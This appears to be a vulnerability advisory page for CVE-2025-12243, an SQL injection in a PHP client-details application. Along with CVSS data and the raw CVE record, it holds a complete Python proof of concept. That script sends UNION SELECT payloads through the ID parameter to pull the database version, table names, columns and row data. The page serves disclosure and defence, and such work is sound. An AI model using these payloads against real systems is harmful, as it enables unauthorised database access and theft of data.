Security Vulnerability Report
CVE-2025-12243 CVSS 6.3 MEDIUM

CVE-2025-12243

Published: 2025-10-27 07:15:40
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was found in code-projects Client Details System 1.0. Affected by this issue is some unknown functionality of the file clientdetails/welcome.php of the component GET Parameter Handler. Performing manipulation of the argument ID results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
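CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Note: the 6.3 MEDIUM score shown here is the Secondary-source CVSS 3.1 assessment. The raw record below also carries a Primary CVSS 3.1 assessment of 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) and a Secondary CVSS 4.0 score of 2.1 LOW, so triage should not rely on the headline figure alone.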

Configurations (Affected Products)

cpe:2.3:a:fabian:client_details_system:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Client Details System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-12243 SQL injection PoC (layout restored from the collapsed listing).
# Target: code-projects Client Details System 1.0
# Component: clientdetails/welcome.php
# Parameter: ID (GET)
#
# Reading notes for defenders:
# - Every request this script sends is a GET to
#   <base>/clientdetails/welcome.php whose ID value begins with "1'" and
#   carries AND / UNION SELECT text; the enumeration helpers also name
#   information_schema and group_concat. Those strings in web-server or WAF
#   logs for this path are the traffic to look for.
# - The record classifies the flaw as CWE-89. The durable fix is server side:
#   bind ID as a query parameter in welcome.php, and if ID is meant to be
#   numeric, reject anything that is not an integer before it reaches SQL.
# - Payload strings are kept exactly as the page gives them; they have not
#   been validated here.


def exploit_sqli(url, payload):
    """Send one GET to welcome.php with *payload* as the ID parameter.

    Returns the response body as text, or None when requests raises a
    RequestException (the error is printed first).
    """
    endpoint = f"{url}/clientdetails/welcome.php"
    query = {'ID': payload}
    try:
        # requests URL-encodes the parameter; the 10 s timeout bounds each probe.
        reply = requests.get(endpoint, params=query, timeout=10)
        return reply.text
    except requests.exceptions.RequestException as err:
        print(f"[-] Error: {err}")
        return None


def get_db_version(url):
    """Send the version() UNION payload and return the raw response body."""
    body = exploit_sqli(
        url,
        "1' UNION SELECT NULL,version(),NULL,NULL,NULL---",
    )
    # Substring test over the whole body: any page containing the word
    # "version" satisfies it, so the message is not proof of extraction.
    looks_positive = bool(body) and 'version' in body.lower()
    if looks_positive:
        print("[+] Database version extracted successfully")
    # The collapsed listing does not show whether this return sat inside the
    # `if`; it is placed at function level here.
    return body


def get_db_name(url):
    """Send the database() UNION payload and return the raw response body."""
    return exploit_sqli(
        url,
        "1' UNION SELECT NULL,database(),NULL,NULL,NULL---",
    )


def get_tables(url):
    """Send the information_schema.tables payload and return the raw body."""
    table_query = "1' UNION SELECT NULL,group_concat(table_name),NULL,NULL,NULL FROM information_schema.tables WHERE table_schema=database()---"
    return exploit_sqli(url, table_query)


def get_columns(url, table_name):
    """Send the information_schema.columns payload for *table_name*.

    Not called from main(); table_name is interpolated into the payload as-is.
    """
    column_query = f"1' UNION SELECT NULL,group_concat(column_name),NULL,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}'---"
    return exploit_sqli(url, column_query)


def extract_data(url, table_name, columns):
    """Send a group_concat payload over *columns* of *table_name*.

    Not called from main(); both arguments are interpolated as-is.
    """
    column_list = ','.join(columns)
    data_query = f"1' UNION SELECT NULL,group_concat({column_list}),NULL,NULL,NULL FROM {table_name}---"
    return exploit_sqli(url, data_query)


def main():
    """Run the three probe stages against the base URL given in argv[1].

    Return values of the probes are discarded; only the stage banners and
    the version-check message are printed.
    """
    cli_args = sys.argv[1:]
    if not cli_args:
        print("Usage: python cve-2025-12243.py <target_url>")
        print("Example: python cve-2025-12243.py http://localhost/client-details-system")
        sys.exit(1)

    base_url = cli_args[0].rstrip('/')
    print("[*] Starting CVE-2025-12243 SQL Injection Exploitation")
    print(f"[*] Target: {base_url}")

    # Stage 1: boolean probe; the response is not inspected.
    print("\n[1] Detecting SQL injection vulnerability...")
    exploit_sqli(base_url, "1' AND 1=1---")

    # Stage 2: version() and database() requests.
    print("\n[2] Extracting database information...")
    get_db_version(base_url)
    get_db_name(base_url)

    # Stage 3: table-name request against information_schema.
    print("\n[3] Enumerating database tables...")
    get_tables(base_url)

    print("\n[!] Manual verification required for data extraction")
    print("[!] This PoC is for educational and authorized testing purposes only")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12243", "sourceIdentifier": "[email protected]", "published": "2025-10-27T07:15:40.237", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in code-projects Client Details System 1.0. Affected by this issue is some unknown functionality of the file clientdetails/welcome.php of the component GET Parameter Handler. Performing manipulation of the argument ID results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", 
"negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:client_details_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BF8DA67D-864D-46F0-A564-02427490562A"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/hellonewbie/tutorial/issues/6", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329914", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329914", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673773", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}